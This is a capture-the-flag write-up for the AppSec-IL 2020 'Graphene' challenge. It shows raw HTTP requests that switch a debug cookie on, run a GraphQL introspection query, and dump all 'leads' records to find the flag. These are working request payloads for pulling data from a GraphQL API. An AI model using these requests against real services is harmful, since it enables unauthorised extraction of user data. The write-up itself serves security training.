CTFtime.org / AppSec-IL 2020 CTF / Graphene / Writeup

First, you login, the request is:
```
POST /api HTTP/1.1
Host: graphene.appsecil.ctf.today
Connection: close
Content-Length: 85
sec-ch-ua: "Chromium";v="86", "\"Not\\A;Brand";v="99", "Google Chrome";v="86"
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Content-Type: application/json; charset=UTF-8
Origin: https://graphene.appsecil.ctf.today
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://graphene.appsecil.ctf.today/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: __cfduid=de841180ad593ef31014e339d62331ca11603713409; debug=0

{"query":"mutation login {login(username:\"a\", password: \"aaaaaaaaaaaaaaaaaaaaaaaaa\") {user {username}ok}}"}
```

Change `debug=0` to `debug=1`

Change `query` to `fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef }}fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue}fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } }}query IntrospectionQuery { __schema { queryType { name } mutationType { name } types { ...FullType } directives { name description locations args { ...InputValue } } }}`

Server response:

```json
...
__schema": {
"queryType": {
"name": "Query"
},
"mutationType": {
"name": "Mutations"
},
"types": [
{
"kind": "OBJECT",
"name": "Query",
"description": null,
"fields": [
{
"name": "user",
"description": null,
"args": [],
"type": {
"kind": "OBJECT",
"name": "User",
"ofType": null
},
"isDeprecated": false,
"deprecationReason": null
},
{
"name": "leads",
"description": null,
"args": [
{
"name": "limit",
"description": null,
"type": {
"kind": "SCALAR",
"name": "Int",
"ofType": null
},
"defaultValue": null
}
],
"type": {
"kind": "LIST",
"name": null,
"ofType": {
"kind": "OBJECT",
"name": "Lead",
"ofType": null
}
},
"isDeprecated": false,
"deprecationReason": null
}
],
"inputFields": null,
"interfaces": [],
"enumValues": null,
"possibleTypes": null
},
...
```

You can see through the schema, got the query name `leads`, using this to query all the leads:

The request is:

```
POST /api HTTP/1.1
Host: graphene.appsecil.ctf.today
Connection: close
Content-Length: 85
sec-ch-ua: "Chromium";v="86", "\"Not\\A;Brand";v="99", "Google Chrome";v="86"
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Content-Type: application/json; charset=UTF-8
Origin: https://graphene.appsecil.ctf.today
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://graphene.appsecil.ctf.today/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: __cfduid=de841180ad593ef31014e339d62331ca11603713409; debug=1

{"query":"{leads(limit:100000){id,firstName,lastName,email,gender,ipAddress,isVip}}"}
```

The response:

```
...
{
"id": "62",
"firstName": "Claiborne",
"lastName": "Wrathall",
"email": "AppSec-IL{c4R8ON-15-9r4phene}",
"gender": "Male",
"ipAddress": "135.39.36.56",
"isVip": true
},
...
```

Graphene

Comments

Sign in with